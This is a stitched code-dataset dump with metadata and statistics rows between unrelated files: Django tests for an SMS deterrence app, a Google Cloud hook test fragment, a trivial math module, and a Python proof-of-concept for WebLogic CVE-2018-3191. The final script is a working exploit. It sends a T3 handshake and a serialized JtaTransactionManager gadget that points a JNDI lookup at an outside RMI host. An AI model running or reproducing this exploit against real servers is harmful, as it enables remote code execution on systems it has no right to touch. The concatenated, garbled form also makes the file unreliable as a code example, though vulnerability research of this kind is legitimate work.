mock_client.return_value.common_location_path.assert_called_once_with(TEST_PROJECT_ID, TEST_REGION)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_update_dataset(self, mock_client) -> None:
self.hook.update_dataset(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset_id=TEST_DATASET_ID,
dataset=TEST_DATASET,
update_mask=TEST_UPDATE_MASK,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.update_dataset.assert_called_once_with(
request=dict(
dataset=TEST_DATASET,
update_mask=TEST_UPDATE_MASK,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.dataset_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID
)
| 38.351085 | 107 | 0.647809 | 2,252 | 19,444 | 5.157194 | 0.070604 | 0.084381 | 0.082659 | 0.103324 | 0.890908 | 0.889788 | 0.889788 | 0.887119 | 0.876012 | 0.876012 | 0 | 0.000356 | 0.276846 | 19,444 | 506 | 108 | 38.426877 | 0.825617 | 0.038675 | 0 | 0.819172 | 0 | 0 | 0.056124 | 0.050179 | 0 | 0 | 0 | 0 | 0.130719 | 1 | 0.04793 | false | 0 | 0.03268 | 0 | 0.084967 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
09370ec21e325c9e347147a14922fe654eb891bf | 31,168 | py | Python | garfield/deterrence/tests/test_tasks.py | RobSpectre/garfield | ab806b7ad9221bd1b17c92daadd0a53a4f261cbe | [
"MIT"
] | 3 | 2017-10-15T20:55:00.000Z | 2018-04-25T21:30:57.000Z | garfield/deterrence/tests/test_tasks.py | RobSpectre/garfield | ab806b7ad9221bd1b17c92daadd0a53a4f261cbe | [
"MIT"
] | 12 | 2018-07-15T20:42:01.000Z | 2021-06-10T17:39:46.000Z | garfield/deterrence/tests/test_tasks.py | RobSpectre/garfield | ab806b7ad9221bd1b17c92daadd0a53a4f261cbe | [
"MIT"
] | 1 | 2018-06-30T02:51:31.000Z | 2018-06-30T02:51:31.000Z | from django.core.files.uploadedfile import SimpleUploadedFile
from django.test import TestCase
from django.test import override_settings
from django.urls import reverse
from mock import patch
from contacts.models import Contact
from phone_numbers.models import PhoneNumber
from sms.models import SmsMessage
from voice.models import Call
from deterrence.models import Deterrent
from deterrence.models import DeterrenceCampaign
from deterrence.models import DeterrenceMessage
import deterrence.tasks
@override_settings(TWILIO_PHONE_NUMBER="+18881112222",
TWILIO_ACCOUNT_SID='ACxxxx',
TWILIO_AUTH_TOKEN='yyyyyyy',
GARFIELD_NUMBER_OF_DETERRENTS=1,
GARFIELD_DETERRENT_INTERVAL=300)
class DeterrenceCampaignTestCase(TestCase):
@patch('deterrence.tasks.check_campaign_for_contact.apply_async')
@patch('contacts.tasks.lookup_contact.apply_async')
def setUp(self, mock_lookup, mock_check_campaign):
self.contact_a = \
Contact.objects.create(phone_number="+15556667777",
whitepages_first_name="John")
self.contact_b = Contact.objects.create(phone_number="+15556667778")
self.contact_c = Contact.objects.create(phone_number="+15556667779")
self.phone_number = PhoneNumber.objects.create(sid="PNxxx",
account_sid="ACxxx",
service_sid="SExxx",
url="http://exmple.com",
e164="+15558675309",
formatted="(555) "
"867-5309",
friendly_name="Stuff.",
number_type="ADV",
country_code="1")
self.det_number = PhoneNumber.objects.create(sid="PNyyy",
account_sid="ACxxx",
service_sid="SExxx",
url="http://exmple.com",
e164="+15558675310",
formatted="(555) "
"867-5310",
friendly_name="Stuff.",
number_type="DET",
country_code="1")
self.contact_a.related_phone_numbers.add(self.phone_number)
self.contact_b.related_phone_numbers.add(self.phone_number)
self.contact_c.related_phone_numbers.add(self.phone_number)
image = SimpleUploadedFile(name="example_image.png",
content=open("./deterrence/tests/assets/"
"example_image.png",
"rb").read(),
content_type="image/png")
self.deterrent = Deterrent.objects.create(image=image,
body="A message from "
"Garfield.",
personalize=True)
self.deterrence_campaign = \
DeterrenceCampaign.objects \
.create(related_deterrent=self.deterrent)
self.deterrence_campaign.related_contacts.add(self.contact_a)
self.deterrence_campaign.related_contacts.add(self.contact_b)
self.deterrence_campaign.related_contacts.add(self.contact_c)
self.message = {"From": "+15556667777",
"To": "+15558675309",
"Body": "Test."}
@patch('deterrence.tasks.send_deterrence.apply_async')
def test_send_deterrence_campaign(self, mock_send):
deterrence.tasks.send_deterrence_campaign("http://example.com")
self.assertEqual(3,
mock_send.call_count)
campaign = DeterrenceCampaign.objects.latest('date_created')
self.assertFalse(campaign.date_sent is None)
@patch('deterrence.tasks.send_deterrence.apply_async')
def test_send_deterrence_do_not_deter(self, mock_send):
self.contact_a.do_not_deter = True
self.contact_a.save()
deterrence.tasks.send_deterrence_campaign("http://example.com")
self.assertEqual(2, mock_send.call_count)
self.assertFalse(self.phone_number.contact_set.all()[0].deterred)
campaign = DeterrenceCampaign.objects.latest('date_created')
self.assertFalse(campaign.date_sent is None)
@patch('deterrence.tasks.send_deterrence.apply_async')
def test_send_deterrence_arrested(self, mock_send):
self.contact_a.arrested = True
self.contact_a.save()
deterrence.tasks.send_deterrence_campaign("http://example.com")
self.assertEqual(2, mock_send.call_count)
self.assertFalse(self.phone_number.contact_set.all()[0].deterred)
campaign = DeterrenceCampaign.objects.latest('date_created')
self.assertFalse(campaign.date_sent is None)
@patch('deterrence.tasks.send_deterrence.apply_async')
def test_send_deterrence_recruiter(self, mock_send):
self.contact_a.recruiter = True
self.contact_a.save()
deterrence.tasks.send_deterrence_campaign("http://example.com")
self.assertEqual(2, mock_send.call_count)
self.assertFalse(self.phone_number.contact_set.all()[0].deterred)
campaign = DeterrenceCampaign.objects.latest('date_created')
self.assertFalse(campaign.date_sent is None)
class DeterrenceTestCase(TestCase):
@patch('deterrence.tasks.check_campaign_for_contact.apply_async')
@patch('contacts.tasks.lookup_contact.apply_async')
def setUp(self, mock_lookup, mock_check_campaign):
self.contact_a = Contact.objects.create(phone_number="+15556667777")
self.contact_b = Contact.objects.create(phone_number="+15556667778")
self.contact_c = Contact.objects.create(phone_number="+15556667779")
self.phone_number = PhoneNumber.objects.create(sid="PNxxx",
account_sid="ACxxx",
service_sid="SExxx",
url="http://exmple.com",
e164="+15558675309",
formatted="(555) "
"867-5309",
friendly_name="Stuff.",
number_type="ADV",
country_code="1")
self.det_number = PhoneNumber.objects.create(sid="PNyyy",
account_sid="ACxxx",
service_sid="SExxx",
url="http://exmple.com",
e164="+15558675310",
formatted="(555) "
"867-5310",
friendly_name="Stuff.",
number_type="DET",
country_code="1")
self.contact_a.related_phone_numbers.add(self.phone_number)
self.contact_b.related_phone_numbers.add(self.phone_number)
self.contact_c.related_phone_numbers.add(self.phone_number)
image = SimpleUploadedFile(name="example_image.png",
content=open("./deterrence/tests/assets/"
"example_image.png",
"rb").read(),
content_type="image/png")
self.deterrent = Deterrent.objects.create(image=image,
body="A message from "
"Garfield.",
personalize=True)
self.deterrence_campaign = \
DeterrenceCampaign.objects \
.create(related_deterrent=self.deterrent)
self.deterrence_campaign.related_contacts.add(self.contact_a)
self.deterrence_campaign.related_contacts.add(self.contact_b)
self.deterrence_campaign.related_contacts.add(self.contact_c)
self.message = {"From": "+15556667777",
"To": "+15558675309",
"Body": "Test."}
@patch('deterrence.tasks.send_sms_message')
def test_send_deterrence(self, mock_send):
mock_send.side_effect = [{'MessageSid': 'MMxxx',
'Body': 'A message from Garfield.',
'Status': 'queued'}]
deterrence.tasks.send_deterrence("http://example.com",
self.deterrence_campaign.id,
self.contact_a.id)
mock_send.assert_called_once_with(
from_="+15558675310",
to="+15556667777",
body="A message from Garfield.",
media_url="http://example.com/"
"{0}".format(self.deterrent.image.url),
status_callback="http://example.com"
"{0}".format(reverse('deterrence:deterrence'
'_message_status_callback')))
self.assertEqual(1,
len(DeterrenceMessage.objects.all()))
contact = Contact.objects.get(pk=self.contact_a.id)
self.assertTrue(contact.deterred)
self.assertEqual(1,
contact.deterrents_received)
@patch('deterrence.tasks.send_sms_message')
def test_send_deterrence_first_name(self, mock_send):
mock_send.side_effect = [{'MessageSid': 'MMxxx',
'Body': 'John, a message from Garfield.',
'Status': 'queued'}]
self.contact_a.whitepages_first_name = "John"
self.contact_a.save()
deterrence.tasks.send_deterrence("http://example.com",
self.deterrence_campaign.id,
self.contact_a.id)
mock_send.assert_called_once_with(
from_="+15558675310",
to="+15556667777",
body="John, a message from Garfield.",
media_url="http://example.com/"
"{0}".format(self.deterrent.image.url),
status_callback="http://example.com"
"{0}".format(reverse('deterrence:deterrence'
'_message_status_callback')))
self.assertEqual(1,
len(DeterrenceMessage.objects.all()))
contact = Contact.objects.get(pk=self.contact_a.id)
self.assertTrue(contact.deterred)
@patch('deterrence.tasks.send_sms_message')
def test_send_deterrence_no_personalize(self, mock_send):
mock_send.side_effect = [{'MessageSid': 'MMxxx',
'Body': 'A message from Garfield.',
'Status': 'queued'}]
self.contact_a.whitepages_first_name = "John"
self.contact_a.save()
self.deterrent.personalize = False
self.deterrent.save()
deterrence.tasks.send_deterrence("http://example.com",
self.deterrence_campaign.id,
self.contact_a.id)
mock_send.assert_called_once_with(
from_="+15558675310",
to="+15556667777",
body="A message from Garfield.",
media_url="http://example.com/"
"{0}".format(self.deterrent.image.url),
status_callback="http://example.com"
"{0}".format(reverse('deterrence:deterrence'
'_message_status_callback')))
self.assertEqual(1,
len(DeterrenceMessage.objects.all()))
contact = Contact.objects.get(pk=self.contact_a.id)
self.assertTrue(contact.deterred)
def test_send_deterrence_do_not_deter(self):
self.contact_a.do_not_deter = True
self.contact_a.save()
result = \
deterrence.tasks.send_deterrence("http://example.com",
self.deterrence_campaign.id,
self.contact_a.id)
self.assertFalse(result)
self.assertFalse(self.contact_a.deterred)
def test_send_deterrence_arrested(self):
self.contact_a.arrested = True
self.contact_a.save()
result = \
deterrence.tasks.send_deterrence("http://example.com",
self.deterrence_campaign.id,
self.contact_a.id)
self.assertFalse(result)
self.assertFalse(self.contact_a.deterred)
def test_send_deterrence_recruiter(self):
self.contact_a.recruiter = True
self.contact_a.save()
result = \
deterrence.tasks.send_deterrence("http://example.com",
self.deterrence_campaign.id,
self.contact_a.id)
self.assertFalse(result)
self.assertFalse(self.contact_a.deterred)
@override_settings(GARFIELD_NUMBER_OF_DETERRENTS=1,
GARFIELD_DETERRENT_INTERVAL=300)
class DeterrenceTestCaseMultipleNumbers(TestCase):
@patch('deterrence.tasks.check_campaign_for_contact.apply_async')
@patch('contacts.tasks.lookup_contact.apply_async')
def setUp(self, mock_lookup, mock_check_campaign):
self.contact_a = Contact.objects.create(phone_number="+15556667777")
self.contact_b = Contact.objects.create(phone_number="+15556667778")
self.contact_c = Contact.objects.create(phone_number="+15556667779")
self.phone_number = PhoneNumber.objects.create(sid="PNxxx",
account_sid="ACxxx",
service_sid="SExxx",
url="http://exmple.com",
e164="+15558675309",
formatted="(555) "
"867-5308",
friendly_name="Stuff.",
number_type="ADV",
country_code="1")
self.det_number_1 = PhoneNumber.objects.create(sid="PNxxx",
account_sid="ACxxx",
service_sid="SExxx",
url="http://exmple.com",
e164="+15558675309",
formatted="(555) "
"867-5309",
friendly_name="Stuff.",
number_type="DET",
country_code="1")
self.det_number_2 = PhoneNumber.objects.create(sid="PNyyy",
account_sid="ACxxx",
service_sid="SExxx",
url="http://exmple.com",
e164="+15558675310",
formatted="(555) "
"867-5310",
friendly_name="Stuff.",
number_type="DET",
country_code="1")
self.det_number_3 = PhoneNumber.objects.create(sid="PNzzz",
account_sid="ACxxx",
service_sid="SExxx",
url="http://exmple.com",
e164="+15558675311",
formatted="(555) "
"867-5311",
friendly_name="BURNED.",
number_type="DET",
burned=True,
country_code="1")
self.contact_a.related_phone_numbers.add(self.phone_number)
self.contact_b.related_phone_numbers.add(self.phone_number)
image = SimpleUploadedFile(name="example_image.png",
content=open("./deterrence/tests/assets/"
"example_image.png",
"rb").read(),
content_type="image/png")
self.deterrent = Deterrent.objects.create(image=image,
body="A message from "
"Garfield.")
self.deterrence_campaign = \
DeterrenceCampaign.objects \
.create(related_deterrent=self.deterrent)
self.deterrence_campaign.related_contacts.add(self.contact_a)
self.deterrence_campaign.related_contacts.add(self.contact_b)
self.deterrence_campaign.related_contacts.add(self.contact_c)
self.contact_c.related_phone_numbers.add(self.phone_number)
self.message = {"From": "+15556667777",
"To": "+15558675309",
"Body": "Test."}
@patch('deterrence.tasks.send_deterrence.apply_async')
def test_send_deterrence_campaign(self, mock_send):
deterrence.tasks.send_deterrence_campaign("http://example.com")
self.assertEqual(3, mock_send.call_count)
for call in mock_send.call_args_list:
args, kwargs = call
self.assertEqual(kwargs['args'][1],
self.deterrence_campaign.id)
@override_settings(GARFIELD_NUMBER_OF_DETERRENTS=3)
@patch('deterrence.tasks.send_deterrence.apply_async')
def test_send_deterrence_campaign_multiple_deterrents(self, mock_send):
deterrence.tasks.send_deterrence_campaign("http://example.com")
self.assertEqual(9, mock_send.call_count)
def test_unused_deterrence_phone_number(self):
test_1 = \
deterrence.tasks \
.get_unused_deterrence_phone_number(self.contact_a)
DeterrenceMessage.objects \
.create(sid="MMxxx",
body="A message to you, Rudy.",
status="delivered",
related_deterrent=self.deterrent,
related_phone_number=self.det_number_2,
related_campaign=self.deterrence_campaign,
related_contact=self.contact_a)
test_2 = \
deterrence.tasks \
.get_unused_deterrence_phone_number(self.contact_a)
self.assertEqual(test_1, self.det_number_2)
self.assertEqual(test_2, self.det_number_1)
def test_unused_deterrence_phone_number_overload(self):
test_1 = \
deterrence.tasks \
.get_unused_deterrence_phone_number(self.contact_a)
DeterrenceMessage.objects \
.create(sid="MMxxx",
body="A message to you, Rudy.",
status="delivered",
related_deterrent=self.deterrent,
related_phone_number=self.det_number_2,
related_campaign=self.deterrence_campaign,
related_contact=self.contact_a)
test_2 = \
deterrence.tasks \
.get_unused_deterrence_phone_number(self.contact_a)
DeterrenceMessage.objects \
.create(sid="MMxxx",
body="A message to you, Rudy.",
status="delivered",
related_deterrent=self.deterrent,
related_phone_number=self.det_number_1,
related_campaign=self.deterrence_campaign,
related_contact=self.contact_a)
test_3 = \
deterrence.tasks \
.get_unused_deterrence_phone_number(self.contact_a)
self.assertEqual(test_1, self.det_number_2)
self.assertEqual(test_2, self.det_number_1)
self.assertEqual(test_3, self.det_number_2)
class DeterrenceCheckCampaignTestCase(TestCase):
@patch('deterrence.tasks.check_campaign_for_contact.apply_async')
@patch('contacts.tasks.lookup_contact.apply_async')
def setUp(self, mock_lookup, mock_check_campaign):
self.contact_a = Contact.objects.create(phone_number="+15556667777")
self.contact_b = Contact.objects.create(phone_number="+15556667778")
self.contact_c = Contact.objects.create(phone_number="+15556667779")
self.phone_number = PhoneNumber.objects.create(sid="PNxxx",
account_sid="ACxxx",
service_sid="SExxx",
url="http://exmple.com",
e164="+15558675309",
formatted="(555) "
"867-5309",
friendly_name="Stuff.",
number_type="ADV",
country_code="1")
self.det_number = PhoneNumber.objects.create(sid="PNyyy",
account_sid="ACxxx",
service_sid="SExxx",
url="http://exmple.com",
e164="+15558675310",
formatted="(555) "
"867-5310",
friendly_name="Stuff.",
number_type="DET",
country_code="1")
self.contact_a.related_phone_numbers.add(self.phone_number)
self.contact_b.related_phone_numbers.add(self.phone_number)
self.contact_c.related_phone_numbers.add(self.phone_number)
image = SimpleUploadedFile(name="example_image.png",
content=open("./deterrence/tests/assets/"
"example_image.png",
"rb").read(),
content_type="image/png")
self.deterrent = Deterrent.objects.create(image=image,
body="A message from "
"Garfield.")
self.deterrence_campaign = \
DeterrenceCampaign.objects \
.create(related_deterrent=self.deterrent)
self.message = {"From": "+15556667777",
"To": "+15558675309",
"Body": "Test."}
def test_check_campaign_for_contact(self):
test = deterrence.tasks.check_campaign_for_contact(self.contact_a.id)
campaign = \
DeterrenceCampaign.objects.get(pk=self.deterrence_campaign.id)
self.assertFalse(test)
self.assertEqual(1,
len(DeterrenceCampaign.objects.all()))
self.assertEqual(campaign.related_contacts.all()[0],
self.contact_a)
def test_check_campaign_for_contact_already_present(self):
self.deterrence_campaign.related_contacts.add(self.contact_b)
self.deterrence_campaign.save()
test = deterrence.tasks.check_campaign_for_contact(self.contact_a.id)
self.assertFalse(test)
second_test = \
deterrence.tasks.check_campaign_for_contact(self.contact_b.id)
campaign = \
DeterrenceCampaign.objects.get(pk=self.deterrence_campaign.id)
self.assertTrue(second_test)
self.assertEqual(2,
len(campaign.related_contacts.all()))
def test_check_campaign_for_contact_campaign_does_not_exist(self):
self.deterrence_campaign.delete()
test = deterrence.tasks.check_campaign_for_contact(self.contact_a.id)
campaigns = DeterrenceCampaign.objects.all()
self.assertFalse(test)
self.assertEqual(1,
len(campaigns))
self.assertEqual(campaigns[0].related_contacts.all()[0],
self.contact_a)
def test_check_campaign_for_contact_multiple_attempts(self):
self.deterrence_campaign.related_contacts.add(self.contact_a)
deterrence.tasks.check_campaign_for_contact(self.contact_a.id)
deterrence.tasks.check_campaign_for_contact(self.contact_a.id)
deterrence.tasks.check_campaign_for_contact(self.contact_a.id)
campaigns = DeterrenceCampaign.objects.all()
self.assertEqual(1,
len(campaigns))
self.assertEqual(1,
len(campaigns[0].related_contacts.all()))
self.assertEqual(campaigns[0].related_contacts.all()[0],
self.contact_a)
@patch('deterrence.tasks.check_campaign_for_contact.apply_async')
def test_only_add_to_campaign_if_sms_advertising_number(self,
mock_check):
SmsMessage.objects.create(to_number="+15558675310",
from_number="+15556667777",
body="Test.",
related_contact=self.contact_a,
related_phone_number=self.det_number)
self.assertFalse(mock_check.called)
@patch('deterrence.tasks.check_campaign_for_contact.apply_async')
def test_only_add_to_campaign_if_call_advertising_number(self,
mock_check):
Call.objects.create(to_number="+15558675310",
from_number="+15556667777",
related_contact=self.contact_a,
related_phone_number=self.det_number)
self.assertFalse(mock_check.called)
@patch('deterrence.tasks.check_campaign_for_contact.apply_async')
def test_add_to_campaign_if_call_advertising_number(self,
mock_check):
Call.objects.create(to_number="+15558675309",
from_number="+15556667777",
related_contact=self.contact_a,
related_phone_number=self.phone_number)
self.assertTrue(mock_check.called)
class DeterrenceMessageStatusCallbackTestCase(TestCase):
@patch('deterrence.tasks.check_campaign_for_contact.apply_async')
@patch('contacts.tasks.lookup_contact.apply_async')
def setUp(self, mock_lookup, mock_check_campaign):
self.contact_a = Contact.objects.create(phone_number="+15556667777")
self.det_number = PhoneNumber.objects.create(sid="PNyyy",
account_sid="ACxxx",
service_sid="SExxx",
url="http://exmple.com",
e164="+15558675310",
formatted="(555) "
"867-5310",
friendly_name="Stuff.",
number_type="DET",
country_code="1")
image = SimpleUploadedFile(name="example_image.png",
content=open("./deterrence/tests/assets/"
"example_image.png",
"rb").read(),
content_type="image/png")
self.deterrent = Deterrent.objects.create(image=image,
body="A message from "
"Garfield.")
self.deterrence_campaign = \
DeterrenceCampaign.objects \
.create(related_deterrent=self.deterrent)
self.deterrence_message = \
DeterrenceMessage.objects \
.create(sid="MMxxxx",
body="A message to you, Rudy.",
status="queued",
related_phone_number=self.det_number,
related_campaign=self.deterrence_campaign,
related_contact=self.contact_a,
related_deterrent=self.deterrent)
def test_handle_deterrence_message_status_callback(self):
deterrence.tasks \
.handle_deterrence_message_status_callback("MMxxxx",
"delivered")
message = DeterrenceMessage.objects.get(sid="MMxxxx")
self.assertEqual("delivered",
message.status)
| 47.730475 | 79 | 0.494995 | 2,623 | 31,168 | 5.61647 | 0.07053 | 0.064214 | 0.050502 | 0.029663 | 0.897977 | 0.885216 | 0.861865 | 0.852159 | 0.841569 | 0.828333 | 0 | 0.039125 | 0.417768 | 31,168 | 652 | 80 | 47.803681 | 0.77269 | 0 | 0 | 0.816981 | 0 | 0 | 0.118294 | 0.040843 | 0 | 0 | 0 | 0 | 0.096226 | 1 | 0.050943 | false | 0 | 0.024528 | 0 | 0.084906 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
11ccbe69c473962e09da1c189797e70c563d89df | 327 | py | Python | SIT/Python/myMath.py | mcdulltii/coding | 8863d92363dda418c5414a109ed71d8446744a13 | [
"Apache-2.0"
] | null | null | null | SIT/Python/myMath.py | mcdulltii/coding | 8863d92363dda418c5414a109ed71d8446744a13 | [
"Apache-2.0"
] | null | null | null | SIT/Python/myMath.py | mcdulltii/coding | 8863d92363dda418c5414a109ed71d8446744a13 | [
"Apache-2.0"
] | 1 | 2020-03-26T05:39:16.000Z | 2020-03-26T05:39:16.000Z | def add(x, y): return x+y
def subtraction(x, y): return x-y
def evenNum(x): return [y for y in x if y % 2 == 0]
def maximum(x): return max(x)
def minimum(x): return min(x)
def absolute(x): return abs(x)
def sumTotal(x): return sum(x)
def clear(x): return [0 for y in x]
def main(): pass
if __name__ == '__main__':
main()
| 327 | 327 | 0.648318 | 67 | 327 | 3.044776 | 0.358209 | 0.205882 | 0.078431 | 0.088235 | 0.127451 | 0.127451 | 0 | 0 | 0 | 0 | 0 | 0.011321 | 0.189602 | 327 | 1 | 327 | 327 | 0.758491 | 0 | 0 | 0 | 0 | 0 | 0.024465 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.818182 | false | 0.090909 | 0 | 0.727273 | 0.818182 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 7 |
11e3371cece0e3a3df1f9a2428ff4f296d6dcd79 | 7,231 | py | Python | POC/CVE_2018_3191.py | Erosion2020/SpaceCore | ba81bf1913461a200f9e88acb7d0d91d7deda8e8 | [
"MIT"
] | 4 | 2022-03-22T08:21:52.000Z | 2022-03-23T12:58:17.000Z | POC/CVE_2018_3191.py | Erosion2020/SpaceCore | ba81bf1913461a200f9e88acb7d0d91d7deda8e8 | [
"MIT"
] | null | null | null | POC/CVE_2018_3191.py | Erosion2020/SpaceCore | ba81bf1913461a200f9e88acb7d0d91d7deda8e8 | [
"MIT"
] | null | null | null | import re
import socket
import struct
import time
import urllib3
urllib3.disable_warnings()
index = "CVE_2018_3191"
def start(ip, port):
con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con.settimeout(10)
try:
con.connect((ip, port))
con.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
time.sleep(2)
except ConnectionRefusedError as ex:
print(f"连接到目标 {ip}:{port} 异常")
except socket.timeout as timeout:
print(f"连接到目标 {ip}:{port} 超时")
con.recv(1024)
data = [
'000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371',
'007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format(
'{:04x}'.format(port)),
'1a7727000d3234322e323134',
'2e312e32353461863d1d0000000078'
]
for item in data:
con.send(bytes.fromhex(item))
time.sleep(2)
payload = '056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
payload = payload.__add__('ACED00057372004D636F6D2E6265612E636F72652E72657061636B616765642E737072696E676672616D65776F726B2E7472616E73616374696F6E2E6A74612E4A74615472616E73616374696F6E4D616E616765724EF3ECFBB628982F0200085A001A616C6C6F77437573746F6D49736F6C6174696F6E4C6576656C735A001C6175746F6465746563745472616E73616374696F6E4D616E616765725A00196175746F646574656374557365725472616E73616374696F6E5A00146361636865557365725472616E73616374696F6E5A001F757365725472616E73616374696F6E4F627461696E656446726F6D4A6E64694C00167472616E73616374696F6E4D616E616765724E616D657400124C6A6176612F6C616E672F537472696E673B4C00267472616E73616374696F6E53796E6368726F6E697A6174696F6E52656769737472794E616D6571007E00014C0013757365725472616E73616374696F6E4E616D6571007E00017872005E636F6D2E6265612E636F72652E72657061636B616765642E737072696E676672616D65776F726B2E7472616E73616374696F6E2E737570706F72742E4162737472616374506C6174666F726D5472616E73616374696F6E4D616E6167657235F8D3063ABC94C402000749000E64656661756C7454696D656F75745A001D6661696C4561726C794F6E476C6F62616C526F6C6C6261636B4F6E6C795A0024676C6F62616C526F6C6C6261636B4F6E50617274696369706174696F6E4661696C7572655A00186E65737465645472616E73616374696F6E416C6C6F7765645A0017726F6C6C6261636B4F6E436F6D6D69744661696C75726549001A7472616E73616374696F6E53796E6368726F6E697A6174696F6E5A001B76616C69646174654578697374696E675472616E73616374696F6E7870FFFFFFFF00010100000000000000010101007070740016726D693A2F2F382E382E382E383A38302F696E646578')
payload = payload.__add__('fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff')
payload = bytes.fromhex(payload)
payload = struct.pack('>I', len(payload)) + payload[4:]
con.send(payload)
time.sleep(2)
res = ''
try:
read_content = con.recv(4096).decode('utf8', 'ignore')
res = res.__add__(read_content)
while res != '' and read_content != '':
time.sleep(0.1)
read_content = con.recv(4096).decode('utf8', 'ignore')
res = res.__add__(read_content)
except Exception:
pass
if 'weblogic.rjvm.ClassTableEntry' in res:
print(f"[*] {ip}:{port} 存在Oracle WebLogic Server WLS 组件远程代码执行漏洞,CVE编号[{index}]")
else:
print(f"[ ] {ip}:{port} 未检测到[{index}]漏洞")
